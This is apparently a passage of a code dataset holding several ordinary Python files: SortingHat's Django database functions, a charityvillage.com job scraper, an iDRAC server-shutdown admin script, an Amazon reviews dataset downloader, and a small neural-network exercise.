f\"individual='{mk}' organization='{org_name}'\"\n        f\"from='{from_date}' to='{to_date}'\"\n    )\n    return Enrollment.objects.filter(individual__mk=mk,\n                                     organization__name=org_name,\n                                     start__lte=to_date, end__gte=from_date).order_by('start')\n\n\ndef add_organization(trxl, name):\n    \"\"\"Add an organization to the database.\n\n    This function adds a new organization to the database,\n    using the given `name` as an identifier. 
Name cannot be\n empty or `None`.\n\n It returns a new `Organization` object.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param name: name of the organization\n\n :returns: a new organization\n\n :raises ValueError: when `name` is `None` or empty.\n :raises AlreadyExistsError: when an instance with the same name\n already exists in the database.\n \"\"\"\n # Setting operation arguments before they are modified\n op_args = {\n 'name': name\n }\n\n validate_field('name', name)\n\n organization = Organization(name=name)\n\n try:\n organization.save()\n except django.db.utils.IntegrityError as exc:\n _handle_integrity_error(Organization, exc)\n\n trxl.log_operation(op_type=Operation.OpType.ADD, entity_type='organization',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['name'])\n\n return organization\n\n\ndef delete_organization(trxl, organization):\n \"\"\"Remove an organization from the database.\n\n Function that removes from the database the organization\n given in `organization`. Data related such as domains\n or enrollments are also removed.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param organization: organization to remove\n \"\"\"\n # Setting operation arguments before they are modified\n op_args = {\n 'organization': organization.name\n }\n\n last_modified = datetime_utcnow()\n Individual.objects.filter(enrollments__organization=organization).\\\n update(last_modified=last_modified)\n\n organization.delete()\n\n trxl.log_operation(op_type=Operation.OpType.DELETE, entity_type='organization',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['organization'])\n\n\ndef add_domain(trxl, organization, domain_name, is_top_domain=True):\n \"\"\"Add a domain to the database.\n\n This function adds a new domain to the database using\n `domain_name` as its identifier. 
The new domain will\n also be linked to the organization object in `organization`.\n\n Values assigned to `domain_name` cannot be `None` or empty.\n The parameter `is_top_domain` only accepts `bool` values.\n\n As a result, the function returns a new `Domain` object.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param organization: links the new domain to this organization object\n :param domain_name: name of the domain\n :param is_top_domain: set this domain as a top domain\n\n :returns: a new domain\n\n :raises ValueError: raised when `domain_name` is `None` or an empty string;\n when `is_top_domain` does not have a `bool` value.\n \"\"\"\n # Setting operation arguments before they are modified\n op_args = {\n 'organization': organization.name,\n 'domain_name': domain_name,\n 'is_top_domain': is_top_domain\n }\n\n validate_field('domain_name', domain_name)\n if not isinstance(is_top_domain, bool):\n raise ValueError(\"'is_top_domain' must have a boolean value\")\n\n domain = Domain(domain=domain_name,\n is_top_domain=is_top_domain,\n organization=organization)\n\n try:\n domain.save()\n except django.db.utils.IntegrityError as exc:\n _handle_integrity_error(Domain, exc)\n\n trxl.log_operation(op_type=Operation.OpType.ADD, entity_type='domain',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['organization'])\n\n return domain\n\n\ndef delete_domain(trxl, domain):\n \"\"\"Remove a domain from the database.\n\n Deletes from the database the domain given in `domain`.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param domain: domain to remove\n \"\"\"\n # Setting operation arguments before they are modified\n op_args = {\n 'domain': domain.domain\n }\n\n domain.delete()\n\n trxl.log_operation(op_type=Operation.OpType.DELETE, entity_type='domain',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['domain'])\n\n\ndef add_individual(trxl, mk):\n \"\"\"Add an individual to the database.\n\n This function adds an individual to the database with\n `mk` string as its main key (i.e main identifier). This\n identifier cannot be empty or `None`.\n\n When the individual is added, a new empty profile for\n this object is created too.\n\n As a result, the function returns a new `Individual`\n object.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param mk: main key for the individual\n\n :returns: a new individual\n\n :raises ValueError: when `mk` is `None` or an empty string\n \"\"\"\n # Setting operation arguments before they are modified\n op_args = {\n 'mk': mk\n }\n\n validate_field('mk', mk)\n\n individual = Individual(mk=mk)\n\n try:\n individual.save(force_insert=True)\n except django.db.utils.IntegrityError as exc:\n _handle_integrity_error(Individual, exc)\n\n trxl.log_operation(op_type=Operation.OpType.ADD, entity_type='individual',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['mk'])\n\n profile = Profile(individual=individual)\n\n try:\n profile.save()\n except django.db.utils.IntegrityError as exc:\n _handle_integrity_error(Profile, exc)\n\n individual.refresh_from_db()\n\n return individual\n\n\ndef delete_individual(trxl, individual):\n \"\"\"Remove an individual from the database.\n\n Function that removes from the database the individual\n given in `individual`. 
Data related to it will be also\n removed.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param individual: individual to remove\n \"\"\"\n # Setting operation arguments before they are modified\n op_args = {\n 'individual': individual.mk\n }\n\n if individual.is_locked:\n raise LockedIdentityError(uuid=individual.mk)\n\n individual.delete()\n\n trxl.log_operation(op_type=Operation.OpType.DELETE, entity_type='individual',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['individual'])\n\n\ndef add_identity(trxl, individual, uuid, source,\n name=None, email=None, username=None):\n \"\"\"Add an identity to the database.\n\n This function adds a new identity to the database using\n `uuid` as its identifier. The new identity will\n also be linked to the individual object of `individual`.\n\n Neither the values given to `uuid` nor to `source` can\n be `None` or empty. Moreover, `name`, `email` or `username`\n parameters need a non empty value.\n\n As a result, the function returns a new `Identity` object.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param individual: links the new identity to this individual object\n :param uuid: identifier for the new identity\n :param source: data source where this identity was found\n :param name: full name of the identity\n :param email: email of the identity\n :param username: user name used by the identity\n\n :returns: a new identity\n\n :raises ValueError: when `uuid` and `source` are `None` or empty;\n when all of the data parameters are `None` or empty.\n \"\"\"\n # Setting operation arguments before they are modified\n op_args = {\n 'individual': individual.mk,\n 'uuid': uuid,\n 'source': source,\n 'name': name,\n 'email': email,\n 'username': username\n }\n\n if individual.is_locked:\n raise LockedIdentityError(uuid=individual.mk)\n\n validate_field('uuid', uuid)\n validate_field('source', source)\n validate_field('name', name, allow_none=True)\n validate_field('email', email, allow_none=True)\n validate_field('username', username, allow_none=True)\n\n if not (name or email or username):\n raise ValueError(\"identity data cannot be None or empty\")\n\n try:\n identity = Identity(uuid=uuid, name=name, email=email,\n username=username, source=source,\n individual=individual)\n identity.save(force_insert=True)\n individual.save()\n except django.db.utils.IntegrityError as exc:\n _handle_integrity_error(Identity, exc)\n\n trxl.log_operation(op_type=Operation.OpType.ADD, entity_type='identity',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['individual'])\n\n return identity\n\n\ndef delete_identity(trxl, identity):\n \"\"\"Remove an identity from the database.\n\n This function removes from the database the identity given\n in `identity`. 
\ndef delete_identity(trxl, identity):\n \"\"\"Remove an identity from the database.\n\n This function removes the identity given in `identity` from the\n database. Note that this function does not remove the individual\n even when it ends up with no identities.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param identity: identity to remove\n \"\"\"\n # Setting operation arguments before they are modified\n op_args = {\n 'identity': identity.uuid\n }\n\n if identity.individual.is_locked:\n raise LockedIdentityError(uuid=identity.individual.mk)\n\n identity.delete()\n identity.individual.save()\n\n trxl.log_operation(op_type=Operation.OpType.DELETE, entity_type='identity',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['identity'])\n\n\ndef update_profile(trxl, individual, **kwargs):\n \"\"\"Update individual profile.\n\n This function edits or updates the profile information\n of the given individual. The values to update are given\n as keyword arguments. The allowed keys are listed below\n (other keywords will be ignored):\n\n - `name`: name of the individual\n - `email`: email address of the individual\n - `gender`: gender of the individual\n - `gender_acc`: gender accuracy (range of 1 to 100; by default, set to 100)\n - `is_bot`: boolean value to determine whether an individual is\n a bot or not. By default, this value is initialized to\n `False`.\n - `country_code`: ISO-3166 country code\n\n As a result, it will return the `Individual` object with\n the updated data.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param individual: individual whose profile will be updated\n :param kwargs: parameters to edit the profile\n\n :returns: individual object with the updated profile\n\n :raises ValueError: raised when `is_bot` does not have a boolean value;\n when `gender_acc` is not an `int` or is out of range.\n \"\"\"\n\n def to_none_if_empty(x):\n return None if not x else x\n\n # Setting operation arguments before they are modified\n op_args = copy.deepcopy(kwargs)\n op_args.update({'individual': individual.mk})\n\n if individual.is_locked:\n raise LockedIdentityError(uuid=individual.mk)\n\n profile = individual.profile\n\n if 'name' in kwargs:\n profile.name = to_none_if_empty(kwargs['name'])\n if 'email' in kwargs:\n profile.email = to_none_if_empty(kwargs['email'])\n\n if 'is_bot' in kwargs:\n is_bot = kwargs['is_bot']\n\n if not isinstance(is_bot, bool):\n raise ValueError(\"'is_bot' must have a boolean value\")\n\n profile.is_bot = is_bot\n\n if 'country_code' in kwargs:\n code = to_none_if_empty(kwargs['country_code'])\n\n if code:\n try:\n country = Country.objects.get(code=code)\n except django.core.exceptions.ObjectDoesNotExist:\n msg = \"'country_code' ({}) does not match with a valid code\"\n raise ValueError(msg.format(str(code)))\n\n profile.country = country\n else:\n profile.country = None\n\n if 'gender' in kwargs:\n gender = to_none_if_empty(kwargs['gender'])\n gender_acc = None\n\n if gender:\n gender_acc = kwargs.get('gender_acc', 100)\n\n if not isinstance(gender_acc, int):\n raise ValueError(\"'gender_acc' must have an integer value\")\n elif not 1 <= gender_acc <= 100:\n raise ValueError(\"'gender_acc' (%d) is not in range (1,100)\"\n % gender_acc)\n\n profile.gender = gender\n profile.gender_acc = gender_acc\n elif 'gender_acc' in kwargs:\n raise ValueError(\"'gender_acc' can only be set when 'gender' is given\")\n\n profile.save()\n individual.save()\n\n trxl.log_operation(op_type=Operation.OpType.UPDATE, entity_type='profile',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['individual'])\n\n return individual\n
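\n# --- Hedged example (made-up values) of the update_profile() contract\n# above; unknown keyword arguments are silently ignored:\n#\n#   indiv = update_profile(trxl, indiv, name='Jane Roe',\n#                          gender='female', gender_acc=75)\n#   update_profile(trxl, indiv, gender_acc=50)\n#   # -> ValueError: 'gender_acc' can only be set when 'gender' is given\n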
\ndef add_enrollment(trxl, individual, organization,\n start=MIN_PERIOD_DATE, end=MAX_PERIOD_DATE):\n \"\"\"Enroll an individual in an organization in the database.\n\n The function adds a new relationship between the individual\n in `individual` and the given `organization` to the database.\n\n The period of the enrollment can be given with the parameters\n `start` and `end`, where `start <= end`.\n Default values for these dates are `MIN_PERIOD_DATE` and\n `MAX_PERIOD_DATE`. These dates cannot be `None`.\n\n As a result, the function returns a new `Enrollment` object.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param individual: individual to enroll\n :param organization: organization where the individual is enrolled\n :param start: date when the enrollment starts\n :param end: date when the enrollment ends\n\n :returns: a new enrollment\n\n :raises ValueError: when either `start` or `end` are `None`;\n when `start < MIN_PERIOD_DATE`; or `end > MAX_PERIOD_DATE`\n or `start > end`.\n \"\"\"\n # Setting operation arguments before they are modified\n op_args = {\n 'individual': individual.mk,\n 'organization': organization.name,\n 'start': copy.deepcopy(str(start)),\n 'end': copy.deepcopy(str(end))\n }\n\n if individual.is_locked:\n raise LockedIdentityError(uuid=individual.mk)\n\n if not start:\n raise ValueError(\"'start' date cannot be None\")\n if not end:\n raise ValueError(\"'end' date cannot be None\")\n\n start = datetime_to_utc(start)\n end = datetime_to_utc(end)\n\n if start < MIN_PERIOD_DATE or start > MAX_PERIOD_DATE:\n raise ValueError(\"'start' date {} is out of bounds\".format(start))\n if end < MIN_PERIOD_DATE or end > MAX_PERIOD_DATE:\n raise ValueError(\"'end' date {} is out of bounds\".format(end))\n if start > end:\n raise ValueError(\"'start' date {} cannot be greater than {}\".format(start, end))\n\n try:\n enrollment = Enrollment(individual=individual,\n organization=organization,\n start=start, end=end)\n enrollment.save()\n individual.save()\n except django.db.utils.IntegrityError as exc:\n _handle_integrity_error(Enrollment, exc)\n\n trxl.log_operation(op_type=Operation.OpType.ADD, entity_type='enrollment',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['individual'])\n\n return enrollment\n
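\n# --- Hedged sketch (dates assumed; datetime_to_utc() is expected to\n# normalize them) of the period validation above:\n#\n#   add_enrollment(trxl, indiv, org,\n#                  start=datetime.datetime(2020, 1, 1, tzinfo=datetime.timezone.utc),\n#                  end=datetime.datetime(2019, 1, 1, tzinfo=datetime.timezone.utc))\n#   # -> ValueError: 'start' date ... cannot be greater than ...\n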
\ndef delete_enrollment(trxl, enrollment):\n \"\"\"Remove an enrollment from the database.\n\n This function removes from the database the enrollment given\n in `enrollment`.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param enrollment: enrollment object to remove\n \"\"\"\n # Setting operation arguments before they are modified\n op_args = {\n 'mk': enrollment.individual.mk,\n 'organization': enrollment.organization.name,\n 'start': str(enrollment.start),\n 'end': str(enrollment.end)\n }\n\n if enrollment.individual.is_locked:\n raise LockedIdentityError(uuid=enrollment.individual.mk)\n\n enrollment.delete()\n enrollment.individual.save()\n\n trxl.log_operation(op_type=Operation.OpType.DELETE, entity_type='enrollment',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['mk'])\n\n\ndef move_identity(trxl, identity, individual):\n \"\"\"Move an identity to an individual.\n\n Shifts `identity` to the individual given in `individual`.\n As a result, it will return the `individual` object with its list of\n identities updated.\n\n When `identity` is already assigned to `individual`, the function\n will raise a `ValueError` exception.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param identity: identity to be moved\n :param individual: individual where `identity` will be moved\n\n :returns: the individual with related identities updated\n\n :raises ValueError: when `identity` is already part of `individual`\n \"\"\"\n # Setting operation arguments before they are modified\n op_args = {\n 'identity': identity.uuid,\n 'individual': individual.mk\n }\n\n if identity.individual.is_locked:\n raise LockedIdentityError(uuid=identity.individual.mk)\n if individual.is_locked:\n raise LockedIdentityError(uuid=individual.mk)\n if identity.individual == individual:\n msg = \"identity '{}' is already assigned to '{}'\".format(identity.uuid, individual.mk)\n raise ValueError(msg)\n\n old_individual = identity.individual\n identity.individual = individual\n\n identity.save()\n old_individual.save()\n individual.save()\n\n trxl.log_operation(op_type=Operation.OpType.UPDATE, entity_type='identity',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['identity'])\n\n return individual\n\n\ndef lock(trxl, individual):\n \"\"\"Lock a given individual.\n\n Locks a given `individual` object so this object and its related objects\n such as identities, enrollments or its profile cannot be modified.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param individual: individual which will be locked\n\n :returns: the individual with lock parameter updated\n \"\"\"\n op_args = {\n 'mk': individual.mk,\n 'is_locked': True\n }\n\n _set_lock(individual, True)\n\n trxl.log_operation(op_type=Operation.OpType.UPDATE, entity_type='individual',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['mk'])\n\n return individual\n\n\ndef unlock(trxl, individual):\n \"\"\"Unlock a given individual.\n\n Unlocks a given `individual` object so this object and its related objects\n such as identities, enrollments or its profile can be modified.\n\n :param trxl: TransactionsLog object from the method calling this one\n :param individual: individual which will be unlocked\n\n :returns: the individual with lock parameter updated\n \"\"\"\n op_args = {\n 'mk': individual.mk,\n 'is_locked': False\n }\n\n _set_lock(individual, False)\n\n trxl.log_operation(op_type=Operation.OpType.UPDATE, entity_type='individual',\n timestamp=datetime_utcnow(), args=op_args,\n target=op_args['mk'])\n\n return individual\n\n\n_MYSQL_DUPLICATE_ENTRY_ERROR_REGEX = re.compile(r\"Duplicate entry '(?P<value>.+)' for key\")\n\n\ndef _handle_integrity_error(model, exc):\n \"\"\"Handle integrity error exceptions.\"\"\"\n\n logger.debug(\"Database operation aborted; integrity error;\",\n exc_info=True)\n\n m = re.match(_MYSQL_DUPLICATE_ENTRY_ERROR_REGEX,\n exc.__cause__.args[1])\n if not m:\n raise exc\n\n entity = model.__name__\n eid = m.group('value')\n\n raise AlreadyExistsError(entity=entity, eid=eid)\n","sub_path":"sortinghat/core/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":27071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"566541094","text":"import urllib.parse\nimport scrapy\nimport abc\nimport time\nfrom bs4 import BeautifulSoup\nfrom scrapy_selenium import SeleniumRequest\nfrom ..items import Job\n\nSCROLL_DOWN='window.scrollTo(0,document.body.scrollHeight);'\n\nclass Scraper_charityvillage_com(scrapy.Spider):\n \"\"\"Use SeleniumRequest because the website requires JavaScript\"\"\"\n\n name = \"charityvillage.com\"\n allowed_domains = [name]\n
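 # Hedged note (not in the original source): scrapy-selenium's\n # SeleniumRequest accepts a `wait_time` and a JavaScript `script`\n # argument; this spider passes SCROLL_DOWN so lazily-loaded results\n # render before parsing, e.g.:\n #\n #   SeleniumRequest(url=url, callback=self.parse,\n #                   wait_time=20, script=SCROLL_DOWN)\n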
 start_urls=['https://charityvillage.com/search/#results/5f4583ff061c57fc640eb1dc?job_type=-Unpaid+Volunteer+Position&page_num=1&kw=']\n\n def start_requests(self):\n for url in self.start_urls:\n # Auto scroll down\n yield SeleniumRequest(url=url, callback=self.parse, \n wait_time=self.selenium_wait_time , \n script=SCROLL_DOWN)\n\n def __init__(self, url=None, start_urls=None, load_full_jobs=False, load_all_pages=False, selenium_wait_time=20):\n\n self.start_urls=[url] if url else start_urls if start_urls else type(self).start_urls\n self.load_full_jobs=load_full_jobs\n self.load_all_pages=load_all_pages\n self.selenium_wait_time=selenium_wait_time\n\n def parse(self, response):\n \"\"\"\n @with_selenium\n @url https://charityvillage.com/search/#results/5f4583ff061c57fc640eb1dc?job_type=-Unpaid+Volunteer+Position&page_num=1&kw=\n @returns items 20 20\n @scrape_not_none url title date_posted apply_before organisation location\n \"\"\"\n page_jobs=[]\n\n \"\"\" Iterating through the result of get_jobs_list()\"\"\"\n\n jobs_div_list=self.get_jobs_list(response)\n for div in jobs_div_list:\n \n # Calling abstract method get_job_dict()\n job_dict=self.get_job_dict(div)\n \n page_jobs.append(job_dict)\n \n \"\"\"\n Load full job page only if:\n - load_full_jobs=Yes\n \"\"\"\n if ( self.load_full_jobs ):\n # Call parse_full_job_page() with job URL\n yield SeleniumRequest(url=job_dict['url'], \n callback=self.parse_full_job_page,\n cb_kwargs=dict(job_dict=job_dict),\n wait_time=self.selenium_wait_time,\n script=SCROLL_DOWN)\n \n else:\n yield Job(job_dict)\n\n \"\"\" Just printing \"\"\"\n if self.load_full_jobs:\n print(\"Scraping {} jobs from {}...\".format(len(page_jobs), response.url))\n else:\n if self.load_all_pages==False:\n print(\"Scraped {} jobs from {}. load_all_pages=False and load_full_jobs=False, some new job postings and job information might be missing\".format(len(page_jobs), response.url))\n else:\n print(\"Scraped {} jobs from {}. load_full_jobs=False, some information might be missing\".format(len(page_jobs), response.url))\n \n \"\"\"\n Scrape next page if\n - load_all_pages=True and get_next_page_url() is not None\n \"\"\"\n if self.load_all_pages:\n if self.get_next_page_url(response) is not None:\n # Loading next page...\n yield SeleniumRequest(\n url=self.get_next_page_url(response),\n callback=self.parse,\n wait_time=self.selenium_wait_time,\n script=SCROLL_DOWN,\n dont_filter=True)\n else:\n print(\"No more pages to load\")\n \n def get_jobs_list(self, response):\n \"\"\"\n Arguments: \n - response: scrapy response object for the listing page\n \n Return a Selector list. \n The result will be automatically iterated in `parse()` method. \n The items will be passed to `get_job_dict()`.\n \n @with_selenium\n @url https://charityvillage.com/search/#results/5f4583ff061c57fc640eb1dc?job_type=-Unpaid+Volunteer+Position&page_num=1&kw=\n @returns_valid_selectorlist\n \"\"\"\n return response.xpath('//ul[contains(@class,\"job-search-results\")]/li')\n\n def get_job_dict(self, selector):\n \"\"\"\n Arguments: \n - selector: selector object of the job posting in the listing \n\n Return a dict {'url':'https://job-url' , 'title':'Job title', 'organisation':'My community' [...] 
}\n \"\"\"\n return {\n 'url':selector.xpath('div/div[contains(@class, \"cl-job-cta\")]/a/@href').get(), \n 'date_posted':selector.xpath('div/div[contains(@class, \"cl-job-info-cont\")]/div[contains(@class, \"cl-job-dates\")]/span[1]/text()').get().split(\"Published: \",1)[-1],\n 'apply_before':selector.xpath('div/div[contains(@class, \"cl-job-info-cont\")]/div[contains(@class, \"cl-job-dates\")]/span[2]/text()').get().split(\"Expiry: \",1)[-1],\n 'organisation':selector.xpath('div/div[contains(@class, \"cl-job-info-cont\")]/span[contains(@class, \"cl-job-company\")]/text()').get(),\n 'location':selector.xpath('div/div[contains(@class, \"cl-job-info-cont\")]/span[contains(@class, \"cl-job-location\")]/text()').get(),\n 'title':selector.xpath('div/div[contains(@class, \"cl-job-info-cont\")]/a[contains(@class,\"cl-job-link\")]/h2/text()').get()\n }\n\n def parse_full_job_page(self, response, job_dict):\n \"\"\"\n Arguments: \n - response: scrapy response object for the job page \n - job_dict: dict containing job raw data, \n this function must return a new Job() FROM this \n data and any other relevant info from the job page \n\n This method is called by `parse()` method if load_full_jobs \n Return a Job() \n\n @with_selenium\n @auto_job_url charityvillage.com\n @scrape_not_none url title description organisation date_posted apply_before location\n @returns items 1 1 \n \"\"\"\n job_dict['description']=BeautifulSoup(response.xpath('//div[contains(@class, \"post-content\")]').get()).get_text()\n return Job(job_dict)\n\n def get_next_page_url(self, response):\n \"\"\"\n Arguments: \n - response: scrapy response object for the listing page\n\n This method is called by `Scraper.parse()` method if load_all_pages \n Return a URL string or None if there no more pages to load \n\n @with_selenium\n @url https://charityvillage.com/search/#results/5f4583ff061c57fc640eb1dc?job_type=-Unpaid+Volunteer+Position&page_num=1&kw=\n @returns_valid_link\n \"\"\"\n # The next button doesn't have a href attribute, we need to click it with javascript and extract the page URL\n if 'Next' in response.xpath('//*[@id=\"cl-jobsearch-results-list\"]/div/div[2]/ul/li[last()]/a/text()').get() :\n next_buttons=response.request.meta['driver'].find_elements_by_xpath('//*[@id=\"cl-jobsearch-results-list\"]/div/div[2]/ul/li[last()]/a')\n if len(next_buttons)>0 :\n response.request.meta['driver'].execute_script(SCROLL_DOWN)\n time.sleep(1)\n response.request.meta['driver'].execute_script(\"arguments[0].click();\", next_buttons[0])\n time.sleep(3)\n return response.request.meta['driver'].current_url\n else:\n return None","sub_path":"charityvillage_jobs/spiders/charityvillage_com.py","file_name":"charityvillage_com.py","file_ext":"py","file_size_in_byte":7280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"242103890","text":"import xlrd\r\n\r\nfrom tkinter import Tk\r\nfrom tkinter import filedialog\r\n\r\nimport subprocess\r\n\r\ndef ping(ip): #Check ping response\r\n\r\n #ping requested server\r\n try:\r\n ping = subprocess.Popen(\r\n [\"ping\", \"-n\", \"1\", '{}'.format(ip)],\r\n stdout = subprocess.PIPE,\r\n stderr = subprocess.PIPE)\r\n out, error = ping.communicate()\r\n except Exception as err:\r\n print(err)\r\n\r\n if \"TTL\" in str(out):\r\n return True\r\n else: return False\r\n\r\ndef shutdownServer(tmp_ip, ip, name):\r\n if ping(tmp_ip):\r\n sub = subprocess.Popen([\"powershell\", \"& racadm -r {} -u root -p password --nocertwarn serveraction 
powerdown\".format(tmp_ip)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n        isSuccess = sub.stdout.readlines()\r\n        if \"successfully\" in str(isSuccess).strip(\"b'\").replace(\"\\\\r\\\\n\", \"\").replace(\" \", \"\").replace(\"\\\\r\", \"\"):\r\n            print(colors.OKGREEN + \"{} shutdown was successful\".format(name) + colors.ENDC)\r\n            return True\r\n        elif \"already\" in str(isSuccess).strip(\"b'\").replace(\"\\\\r\\\\n\", \"\").replace(\" \", \"\").replace(\"\\\\r\", \"\"):\r\n            print(colors.OKPURPLE + \"{} already in shutdown state\".format(name) + colors.ENDC)\r\n        else: \r\n            print(colors.FAIL + \"{} shutdown was not successful\".format(name) + colors.ENDC)\r\n            return False\r\n\r\n    elif ping(ip):\r\n        sub = subprocess.Popen([\"powershell\", \"& racadm -r {} -u root -p password --nocertwarn serveraction powerdown\".format(ip)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n        isSuccess = sub.stdout.readlines()\r\n        if \"successfully\" in str(isSuccess).strip(\"b'\").replace(\"\\\\r\\\\n\", \"\").replace(\" \", \"\").replace(\"\\\\r\", \"\"):\r\n            print(colors.OKGREEN + \"{} shutdown was successful\".format(name) + colors.ENDC)\r\n            return True\r\n        elif \"already\" in str(isSuccess).strip(\"b'\").replace(\"\\\\r\\\\n\", \"\").replace(\" \", \"\").replace(\"\\\\r\", \"\"):\r\n            print(colors.OKPURPLE + \"{} already in shutdown state\".format(name) + colors.ENDC)\r\n        else: \r\n            print(colors.FAIL + \"{} shutdown was not successful\".format(name) + colors.ENDC)\r\n            return False\r\n\r\n    else: print(colors.OKPURPLE + \"Neither the temporary IP address nor the IP address is pingable for server {}\".format(name) + colors.ENDC)\r\n\r\n
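# Hedged refactor sketch (not part of the original script): the two\r\n# ping branches above differ only in the address they use, so they\r\n# could share one helper; the credentials and flags are copied from\r\n# the original command line:\r\n#\r\n# def _racadm_powerdown(address):\r\n#     cmd = \"& racadm -r {} -u root -p password --nocertwarn serveraction powerdown\".format(address)\r\n#     sub = subprocess.Popen([\"powershell\", cmd], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n#     return sub.stdout.readlines()\r\n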
\" + server[\"name\"])\r\n\r\n print(\"\\n\")\r\n serversToClear = input(\"Servers: \")\r\n serversToClear = serversToClear.split(\",\")\r\n\r\n for i, server in zip(range(0, len(excelData)), excelData):\r\n if str(i+1) in serversToClear:\r\n shutdownServer(tmp_ip=server[\"tmp_ip\"], ip=server[\"ip_address\"], name=server[\"name\"])\r\n\r\n elif answer == \"n\":\r\n print(colors.OKPURPLE + \"Exiting script..\" + colors.ENDC)\r\n\r\n","sub_path":"iDrac-Shutdown.py","file_name":"iDrac-Shutdown.py","file_ext":"py","file_size_in_byte":4244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"454314671","text":"#!/usr/bin/env ipython\r\n\r\nfrom tqdm import tqdm\r\nimport requests\r\nimport regex as re\r\nimport os\r\n\r\nos.chdir(os.path.dirname(__file__))\r\nprint(os.getcwd())\r\n\r\nlangs = ['de', 'en', 'es', 'fr', 'ja', 'zh']\r\ndats = ['train', 'dev', 'test']\r\n\r\nfor dat in dats:\r\n\tfor lang in langs:\r\n\t\turl = \"https://amazon-reviews-ml.s3-us-west-2.amazonaws.com/json/\"+dat+\"/dataset_\"+lang+\"_\"+dat+\".json\"\r\n\t\tprint(url)\r\n\t\t\r\n\t\t# If file already exists\r\n\t\tif(os.path.isfile(os.sep.join(re.split('/', url)[-2:]))): print(\"Already exists!!\"); continue\r\n\t\t\r\n\t\t# Streaming, so we can iterate over the response.\r\n\t\treq = requests.get(url, stream=True)\r\n\t\t\r\n\t\t# Total size in bytes.\r\n\t\ttotal_size = int(req.headers.get('content-length', 0))\r\n\t\tblock_size = 1024 #1 Kibibyte\r\n\t\t\r\n\t\tbar = tqdm(total=total_size, unit='iB', unit_scale=True)\r\n\t\t\r\n\t\twith open(os.sep.join(re.split('/', url)[-2:]), 'wb') as foo:\r\n\t\t\tfor data in req.iter_content(block_size):\r\n\t\t\t\tbar.update(len(data))\r\n\t\t\t\tfoo.write(data)\r\n\t\tbar.close()\r\n\t\t\r\n\t\tif total_size != 0 and bar.n != total_size: print(\"ERROR, something went wrong\")\r\n\t\t\r\n\tprint(\"done\")","sub_path":"code/Amazon Reviews/extract_data.py","file_name":"extract_data.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"118754013","text":"import numpy as np\nimport math\n\n\n_entradas = np.array(\n [\n [0, 0],\n [0, 1],\n [1,0],\n [1,1]\n ]\n)\n\n_pesos_camada_1 = np.array(\n [\n [-0.424, 0.358],\n [-0.74, -0.577],\n [-0.961, -0.469],\n ]\n)\n\n_saida = np.array([0, 1, 1, 0])\n\n\ndef ativacao(x):\n \"\"\"\n Função de de ativação segmode\n :param x:\n :return:\n \"\"\"\n y = 1 / (1 + math.exp(-x))\n\n # arredondar para 3 casas decimais\n y = round(y, 3)\n return y\n\n\ndef soma_camada_1(entradas, pesos):\n \"\"\"\n Soma da camada camada 1\n\n :param entradas:\n :param pesos:\n :return:\n \"\"\"\n resultado_intermediario = []\n for i in range(len(entradas)):\n x1, x2 = entradas[i]\n for j in range(len(pesos)):\n peso_x1, peso_x2 = pesos[j]\n resultado_intermediario.append(x1 * peso_x1 + x2 * peso_x2)\n\n return resultado_intermediario\n\n\nresultado_somas_camada_1 = soma_camada_1(_entradas, _pesos_camada_1)\nprint('Resultado da soma da camada 1')\nprint(np.array(resultado_somas_camada_1).reshape(4, 3))\nprint('-' * 30)\n\nresultado_ativacao = []\n\nfor resultado_soma in resultado_somas_camada_1:\n resultado_ativacao.append(ativacao(resultado_soma))\n\nprint('Resultado da função de ativação da camada 1')\nprint(np.array(resultado_ativacao).reshape(4,3))\nprint('-' * 30)\n\n\"\"\"\n Gerando as novas entradas\n Foi necessário converter a lista para array\n o método reshape serve para colocar em matriz 
